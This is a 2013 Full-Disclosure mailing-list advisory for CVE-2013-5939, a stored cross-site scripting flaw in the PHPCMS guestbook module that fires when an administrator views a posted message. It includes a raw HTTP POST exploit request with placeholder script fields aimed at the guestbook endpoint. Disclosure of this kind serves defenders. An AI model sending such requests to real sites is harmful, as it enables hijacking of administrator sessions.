[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] [CVE-2013-5939]PHPCMS guestbook module Stored XSS Vulnerability



CVE-2013-5939:PHPCMS guestbook module Stored XSS Vulnerability 

Severity: Important

Vendor: phpcms.cn

Versions Affected: All of use guestbook module phpcms

Description: The phpcms has be found the Stored XSS Vulnerability if use the 
guestbook module.someone can insert xss code at the front guestbook,when admin 
view this message in the admin control
panel,the xss code has be implemented

Exploit:


POST /index.php?m=guestbook&c=index&a=register&siteid=1 HTTP/1.1Host: 
www.attack.cnUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; 
+http://www.baidu.com/search/spider.html)Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: 
zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: 
PHPSESSID=40360ct0tfshplcik807r9phr4; Connection: keep-aliveContent-Type: 
application/x-www-form-urlencodedContent-Length: 
317typeid=54&codes=&title=[xsscode]&introduce=[xsscode]&department=&area=&name=&tel=&email=&isbbs=on&code=dmsc&dosubmit=

Credit: This issue was discovered by robert root#cnmoker.org.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/